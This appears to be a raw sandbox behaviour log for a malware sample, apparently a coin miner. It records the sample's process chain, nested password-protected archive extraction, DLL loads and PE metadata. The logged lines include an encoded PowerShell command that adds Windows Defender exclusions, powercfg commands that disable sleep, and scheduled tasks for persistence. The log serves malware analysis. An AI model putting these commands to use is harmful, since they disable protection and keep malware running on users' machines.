                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7625" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Users\user\Desktop\inject.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\conhost.exe "C:\Users\user\AppData\Local\Temp\conhost.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p29586644319935208542739921766 -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_11.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_10.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_9.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_8.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7625" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Users\user\Desktop\inject.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: esdsip.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\mode.comSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\mode.comSection loaded: ureg.dllJump to behavior
                  Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                  Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
                  Source: Google Chrome.lnk.3.drLNK file: ..\..\..\Program Files\Google\Chrome\Application\chrome.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: inject.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: inject.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: inject.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: Installer.exe, 00000016.00000002.2282337473.000000000031C000.00000004.00000001.01000000.0000000D.sdmp, Installer.exe, 00000016.00000003.2281553518.0000000003542000.00000040.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.2334616398.0000000000402000.00000020.00000400.00020000.00000000.sdmp
                  Source: Binary string: c:\rje\tg\v\obj\Release\Qrr.pdb source: inject.exe
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo,5_2_00402665
                  Source: Installer.exe.20.drStatic PE information: real checksum: 0x3425e should be: 0xa3dbd
                  Source: 7z.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x7b29e
                  Source: 7z.dll.5.drStatic PE information: real checksum: 0x0 should be: 0x1a2c6b
